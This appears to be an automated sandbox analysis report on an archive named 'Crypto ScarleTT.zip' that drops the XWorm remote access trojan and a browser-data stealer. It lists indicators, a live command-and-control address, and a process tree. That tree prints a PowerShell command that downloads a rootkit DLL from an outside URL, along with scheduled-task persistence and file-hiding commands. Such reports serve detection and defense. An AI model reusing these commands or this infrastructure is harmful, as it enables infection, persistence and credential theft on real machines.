xworm | 8d06880ffcc7799c543488ecfc190f0ff920ec8aeb24e258c4cf37585be16a0b

Analysis

max time kernel
123s
max time network
157s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
02-11-2024 17:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Crypto ScarleTT.zip
Size

100.5MB
MD5

f72c382de5e87ccd123c1e623254ed3f
SHA1

bfe62a5988a7a5b97b5e6a63e1bcae2a4c43f18d
SHA256

8d06880ffcc7799c543488ecfc190f0ff920ec8aeb24e258c4cf37585be16a0b
SHA512

fb7b1a45315c21d38b8e56dfea0f257df6cf527c1a59af906f595b76bcb17c7e1602479e57ebbf185de433ace56bb4521d463c6117c566e5dc4486e95965023f
SSDEEP

1572864:4fqo94gbSX8+3k43neZYWqbY4lhz++RVb7tN2uQm64il0s62a8cBdOLRWjqBaw:4yof4ge0Sz+ALtQv0s6RULsed

Score

10^/10

xworm discovery evasion execution persistence pyinstaller rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://github.com/NGROKC/CTC/raw/main/CTC64.dll

Extracted

Family

xworm

SLL.casacam.net:4444

Attributes

Install_directory
%ProgramData%
install_file
Interrupts.exe

Signatures

Detect Xworm Payload 5 IoCs

resource	yara_rule
behavioral1/files/0x000800000001707c-17.dat	family_xworm
behavioral1/files/0x00080000000173f3-23.dat	family_xworm
behavioral1/memory/2852-40-0x0000000000940000-0x0000000000972000-memory.dmp	family_xworm
behavioral1/memory/2876-39-0x0000000001310000-0x0000000001328000-memory.dmp	family_xworm
behavioral1/memory/1632-267-0x0000000000DC0000-0x0000000000DD8000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2680	powershell.exe
7	2680	powershell.exe

Sets file to hidden 1 TTPs 2 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
2388	attrib.exe
2896	attrib.exe

Drops startup file 6 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Interrupi.lnk	winlogoc.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Interrupi.lnk	winlogoc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Interrupts.lnk	wmpnetwk.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Interrupts.lnk	wmpnetwk.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-System32.exe	$77-System32.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-System32.exe	$77-System32.exe

Executes dropped EXE 16 IoCs

pid	Process
2440	Crypto Scarlett.exe
2852	wmpnetwk.exe
2876	winlogoc.exe
2756	S444.exe
2928	aler.exe
1988	checkcoin.exe
1780	aler.exe
1268	$77-System32.exe
1632	Interrupi.exe
2844	Interrupi.exe
2824	wmpnetwk.exe
1432	winlogoc.exe
2016	S444.exe
268	aler.exe
3016	checkcoin.exe
1384	aler.exe

Loads dropped DLL 17 IoCs

pid	Process
2440	Crypto Scarlett.exe
2440	Crypto Scarlett.exe
2440	Crypto Scarlett.exe
2440	Crypto Scarlett.exe
2440	Crypto Scarlett.exe
1204	Process not Found
2928	aler.exe
1780	aler.exe
1204	Process not Found
2756	S444.exe
1296	Crypto Scarlett.exe
1296	Crypto Scarlett.exe
1296	Crypto Scarlett.exe
1296	Crypto Scarlett.exe
1296	Crypto Scarlett.exe
268	aler.exe
1384	aler.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\Interrupi = "C:\\Users\\Admin\\AppData\\Local\\Interrupi.exe"	winlogoc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\Interrupts = "C:\\ProgramData\\Interrupts.exe"	wmpnetwk.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\$77-System32 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$77-System32.exe"	$77-System32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\$77-System32 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$77-System32.exe"	$77-System32.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2680	powershell.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 2 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x0006000000018f65-33.dat	pyinstaller
behavioral1/files/0x000600000001904c-62.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	S444.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Crypto Scarlett.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	S444.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Crypto Scarlett.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	$77-System32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

NSIS installer 2 IoCs

installer

resource	yara_rule
behavioral1/files/0x0007000000016edb-4.dat	nsis_installer_1
behavioral1/files/0x0007000000016edb-4.dat	nsis_installer_2

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2216	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 3 IoCs

pid	Process
2876	winlogoc.exe
2852	wmpnetwk.exe
1268	$77-System32.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2012	7zFM.exe
2012	7zFM.exe
2012	7zFM.exe
2012	7zFM.exe
2012	7zFM.exe
2852	wmpnetwk.exe
2680	powershell.exe
2852	wmpnetwk.exe
2852	wmpnetwk.exe
2852	wmpnetwk.exe
2852	wmpnetwk.exe
2852	wmpnetwk.exe
2852	wmpnetwk.exe
2852	wmpnetwk.exe
2852	wmpnetwk.exe
2852	wmpnetwk.exe
1268	$77-System32.exe
1268	$77-System32.exe
2852	wmpnetwk.exe
2852	wmpnetwk.exe
2852	wmpnetwk.exe
1268	$77-System32.exe
1268	$77-System32.exe
2852	wmpnetwk.exe
2852	wmpnetwk.exe
2852	wmpnetwk.exe
1268	$77-System32.exe
1268	$77-System32.exe
2852	wmpnetwk.exe
2852	wmpnetwk.exe
2852	wmpnetwk.exe
1268	$77-System32.exe
1268	$77-System32.exe
2852	wmpnetwk.exe
2852	wmpnetwk.exe
2852	wmpnetwk.exe
1268	$77-System32.exe
1268	$77-System32.exe
2852	wmpnetwk.exe
2852	wmpnetwk.exe
2852	wmpnetwk.exe
1268	$77-System32.exe
1268	$77-System32.exe
2852	wmpnetwk.exe
2852	wmpnetwk.exe
2852	wmpnetwk.exe
1268	$77-System32.exe
1268	$77-System32.exe
2852	wmpnetwk.exe
2852	wmpnetwk.exe
2852	wmpnetwk.exe
1268	$77-System32.exe
1268	$77-System32.exe
2852	wmpnetwk.exe
2852	wmpnetwk.exe
2852	wmpnetwk.exe
1268	$77-System32.exe
1268	$77-System32.exe
2852	wmpnetwk.exe
2852	wmpnetwk.exe
2852	wmpnetwk.exe
1268	$77-System32.exe
1268	$77-System32.exe
2852	wmpnetwk.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2012	7zFM.exe

Suspicious use of AdjustPrivilegeToken 43 IoCs

description	pid	Process
Token: SeRestorePrivilege	2012	7zFM.exe
Token: 35	2012	7zFM.exe
Token: SeSecurityPrivilege	2012	7zFM.exe
Token: SeDebugPrivilege	2876	winlogoc.exe
Token: SeDebugPrivilege	2852	wmpnetwk.exe
Token: SeDebugPrivilege	2876	winlogoc.exe
Token: SeDebugPrivilege	2852	wmpnetwk.exe
Token: SeDebugPrivilege	2680	powershell.exe
Token: SeDebugPrivilege	1632	Interrupi.exe
Token: SeDebugPrivilege	1268	$77-System32.exe
Token: 33	1268	$77-System32.exe
Token: SeIncBasePriorityPrivilege	1268	$77-System32.exe
Token: 33	1268	$77-System32.exe
Token: SeIncBasePriorityPrivilege	1268	$77-System32.exe
Token: 33	1268	$77-System32.exe
Token: SeIncBasePriorityPrivilege	1268	$77-System32.exe
Token: 33	1268	$77-System32.exe
Token: SeIncBasePriorityPrivilege	1268	$77-System32.exe
Token: 33	1268	$77-System32.exe
Token: SeIncBasePriorityPrivilege	1268	$77-System32.exe
Token: SeDebugPrivilege	2844	Interrupi.exe
Token: 33	1268	$77-System32.exe
Token: SeIncBasePriorityPrivilege	1268	$77-System32.exe
Token: SeDebugPrivilege	2824	wmpnetwk.exe
Token: SeDebugPrivilege	1432	winlogoc.exe
Token: 33	1268	$77-System32.exe
Token: SeIncBasePriorityPrivilege	1268	$77-System32.exe
Token: 33	1268	$77-System32.exe
Token: SeIncBasePriorityPrivilege	1268	$77-System32.exe
Token: SeShutdownPrivilege	1100	chrome.exe
Token: SeShutdownPrivilege	1100	chrome.exe
Token: SeShutdownPrivilege	1100	chrome.exe
Token: SeShutdownPrivilege	1100	chrome.exe
Token: SeShutdownPrivilege	1100	chrome.exe
Token: SeShutdownPrivilege	1100	chrome.exe
Token: SeShutdownPrivilege	1100	chrome.exe
Token: SeShutdownPrivilege	1100	chrome.exe
Token: SeShutdownPrivilege	1100	chrome.exe
Token: SeShutdownPrivilege	1100	chrome.exe
Token: SeShutdownPrivilege	1100	chrome.exe
Token: SeShutdownPrivilege	1100	chrome.exe
Token: SeShutdownPrivilege	1100	chrome.exe
Token: SeShutdownPrivilege	1100	chrome.exe

Suspicious use of FindShellTrayWindow 37 IoCs

pid	Process
2012	7zFM.exe
2012	7zFM.exe
2012	7zFM.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe
1100	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2852	wmpnetwk.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2012 wrote to memory of 2440	2012	7zFM.exe	31
PID 2012 wrote to memory of 2440	2012	7zFM.exe	31
PID 2012 wrote to memory of 2440	2012	7zFM.exe	31
PID 2012 wrote to memory of 2440	2012	7zFM.exe	31
PID 2440 wrote to memory of 2852	2440	Crypto Scarlett.exe	32
PID 2440 wrote to memory of 2852	2440	Crypto Scarlett.exe	32
PID 2440 wrote to memory of 2852	2440	Crypto Scarlett.exe	32
PID 2440 wrote to memory of 2852	2440	Crypto Scarlett.exe	32
PID 2440 wrote to memory of 2876	2440	Crypto Scarlett.exe	33
PID 2440 wrote to memory of 2876	2440	Crypto Scarlett.exe	33
PID 2440 wrote to memory of 2876	2440	Crypto Scarlett.exe	33
PID 2440 wrote to memory of 2876	2440	Crypto Scarlett.exe	33
PID 2440 wrote to memory of 2756	2440	Crypto Scarlett.exe	34
PID 2440 wrote to memory of 2756	2440	Crypto Scarlett.exe	34
PID 2440 wrote to memory of 2756	2440	Crypto Scarlett.exe	34
PID 2440 wrote to memory of 2756	2440	Crypto Scarlett.exe	34
PID 2440 wrote to memory of 2928	2440	Crypto Scarlett.exe	35
PID 2440 wrote to memory of 2928	2440	Crypto Scarlett.exe	35
PID 2440 wrote to memory of 2928	2440	Crypto Scarlett.exe	35
PID 2440 wrote to memory of 2928	2440	Crypto Scarlett.exe	35
PID 2440 wrote to memory of 1988	2440	Crypto Scarlett.exe	36
PID 2440 wrote to memory of 1988	2440	Crypto Scarlett.exe	36
PID 2440 wrote to memory of 1988	2440	Crypto Scarlett.exe	36
PID 2440 wrote to memory of 1988	2440	Crypto Scarlett.exe	36
PID 2928 wrote to memory of 1780	2928	aler.exe	37
PID 2928 wrote to memory of 1780	2928	aler.exe	37
PID 2928 wrote to memory of 1780	2928	aler.exe	37
PID 2756 wrote to memory of 2100	2756	S444.exe	39
PID 2756 wrote to memory of 2100	2756	S444.exe	39
PID 2756 wrote to memory of 2100	2756	S444.exe	39
PID 2756 wrote to memory of 2100	2756	S444.exe	39
PID 2100 wrote to memory of 2388	2100	cmd.exe	41
PID 2100 wrote to memory of 2388	2100	cmd.exe	41
PID 2100 wrote to memory of 2388	2100	cmd.exe	41
PID 2100 wrote to memory of 2388	2100	cmd.exe	41
PID 2756 wrote to memory of 1268	2756	S444.exe	42
PID 2756 wrote to memory of 1268	2756	S444.exe	42
PID 2756 wrote to memory of 1268	2756	S444.exe	42
PID 2756 wrote to memory of 1268	2756	S444.exe	42
PID 2876 wrote to memory of 2216	2876	winlogoc.exe	43
PID 2876 wrote to memory of 2216	2876	winlogoc.exe	43
PID 2876 wrote to memory of 2216	2876	winlogoc.exe	43
PID 1268 wrote to memory of 3004	1268	$77-System32.exe	47
PID 1268 wrote to memory of 3004	1268	$77-System32.exe	47
PID 1268 wrote to memory of 3004	1268	$77-System32.exe	47
PID 1268 wrote to memory of 3004	1268	$77-System32.exe	47
PID 3004 wrote to memory of 2896	3004	cmd.exe	49
PID 3004 wrote to memory of 2896	3004	cmd.exe	49
PID 3004 wrote to memory of 2896	3004	cmd.exe	49
PID 3004 wrote to memory of 2896	3004	cmd.exe	49
PID 1268 wrote to memory of 2604	1268	$77-System32.exe	50
PID 1268 wrote to memory of 2604	1268	$77-System32.exe	50
PID 1268 wrote to memory of 2604	1268	$77-System32.exe	50
PID 1268 wrote to memory of 2604	1268	$77-System32.exe	50
PID 2604 wrote to memory of 2680	2604	cmd.exe	52
PID 2604 wrote to memory of 2680	2604	cmd.exe	52
PID 2604 wrote to memory of 2680	2604	cmd.exe	52
PID 2604 wrote to memory of 2680	2604	cmd.exe	52
PID 2884 wrote to memory of 1632	2884	taskeng.exe	54
PID 2884 wrote to memory of 1632	2884	taskeng.exe	54
PID 2884 wrote to memory of 1632	2884	taskeng.exe	54
PID 2884 wrote to memory of 2844	2884	taskeng.exe	59
PID 2884 wrote to memory of 2844	2884	taskeng.exe	59
PID 2884 wrote to memory of 2844	2884	taskeng.exe	59

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2388	attrib.exe
2896	attrib.exe

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Crypto ScarleTT.zip"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2012
- C:\Users\Admin\AppData\Local\Temp\7zOCD72E6C6\Crypto Scarlett.exe
  "C:\Users\Admin\AppData\Local\Temp\7zOCD72E6C6\Crypto Scarlett.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2440
- - C:\Users\Admin\AppData\Local\Temp\wmpnetwk.exe
    "C:\Users\Admin\AppData\Local\Temp\wmpnetwk.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:2852
- - C:\Users\Admin\AppData\Local\Temp\winlogoc.exe
    "C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2876
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Interrupi" /tr "C:\Users\Admin\AppData\Local\Interrupi.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2216
- - C:\Users\Admin\AppData\Local\Temp\S444.exe
    "C:\Users\Admin\AppData\Local\Temp\S444.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2756
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\S444.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2100
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\S444.exe"
        5⤵
        Sets file to hidden
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:2388
  - - C:\System32\$77-System32.exe
      "C:\System32\$77-System32.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Suspicious behavior: AddClipboardFormatListener
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1268
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c attrib +s +h +r "C:\System32\$77-System32.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3004
      - C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h +r "C:\System32\$77-System32.exe"
        6⤵
        Sets file to hidden
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:2896
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Rot.bat" "
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2604
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell (new-object System.Net.WebClient).DownloadFile('https://github.com/NGROKC/CTC/raw/main/CTC64.dll','\System32\r77-x64.dll');exit
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2680
- - C:\Users\Admin\AppData\Local\Temp\aler.exe
    "C:\Users\Admin\AppData\Local\Temp\aler.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2928
  - - C:\Users\Admin\AppData\Local\Temp\aler.exe
      "C:\Users\Admin\AppData\Local\Temp\aler.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1780
- - C:\Users\Admin\AppData\Local\Temp\checkcoin.exe
    "C:\Users\Admin\AppData\Local\Temp\checkcoin.exe"
    3⤵
    - Executes dropped EXE
    PID:1988

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:1220

C:\Windows\system32\taskeng.exe
taskeng.exe {15178590-BF9D-4637-8762-579FDFD499B7} S-1-5-21-1488793075-819845221-1497111674-1000:UPNECVIU\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:2884
- C:\Users\Admin\AppData\Local\Interrupi.exe
  C:\Users\Admin\AppData\Local\Interrupi.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1632
- C:\Users\Admin\AppData\Local\Interrupi.exe
  C:\Users\Admin\AppData\Local\Interrupi.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2844

C:\Users\Admin\Desktop\fsdf\Crypto Scarlett.exe
"C:\Users\Admin\Desktop\fsdf\Crypto Scarlett.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1296
- C:\Users\Admin\AppData\Local\Temp\wmpnetwk.exe
  "C:\Users\Admin\AppData\Local\Temp\wmpnetwk.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2824
- C:\Users\Admin\AppData\Local\Temp\winlogoc.exe
  "C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1432
- C:\Users\Admin\AppData\Local\Temp\S444.exe
  "C:\Users\Admin\AppData\Local\Temp\S444.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2016
- C:\Users\Admin\AppData\Local\Temp\aler.exe
  "C:\Users\Admin\AppData\Local\Temp\aler.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:268
- - C:\Users\Admin\AppData\Local\Temp\aler.exe
    "C:\Users\Admin\AppData\Local\Temp\aler.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1384
- C:\Users\Admin\AppData\Local\Temp\checkcoin.exe
  "C:\Users\Admin\AppData\Local\Temp\checkcoin.exe"
  2⤵
  - Executes dropped EXE
  PID:3016

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1100
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7feeeb19758,0x7feeeb19768,0x7feeeb19778
  2⤵
  PID:1076
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1184 --field-trial-handle=1380,i,17567223204195449919,11036989016641761234,131072 /prefetch:2
  2⤵
  PID:840
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1520 --field-trial-handle=1380,i,17567223204195449919,11036989016641761234,131072 /prefetch:8
  2⤵
  PID:1536
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1624 --field-trial-handle=1380,i,17567223204195449919,11036989016641761234,131072 /prefetch:8
  2⤵
  PID:1632
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2168 --field-trial-handle=1380,i,17567223204195449919,11036989016641761234,131072 /prefetch:1
  2⤵
  PID:316
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2176 --field-trial-handle=1380,i,17567223204195449919,11036989016641761234,131072 /prefetch:1
  2⤵
  PID:2152
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1484 --field-trial-handle=1380,i,17567223204195449919,11036989016641761234,131072 /prefetch:2
  2⤵
  PID:2772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2452 --field-trial-handle=1380,i,17567223204195449919,11036989016641761234,131072 /prefetch:1
  2⤵
  PID:688
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3432 --field-trial-handle=1380,i,17567223204195449919,11036989016641761234,131072 /prefetch:8
  2⤵
  PID:2612
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3560 --field-trial-handle=1380,i,17567223204195449919,11036989016641761234,131072 /prefetch:8
  2⤵
  PID:1624
- C:\Program Files\Google\Chrome\Application\chrome.exe
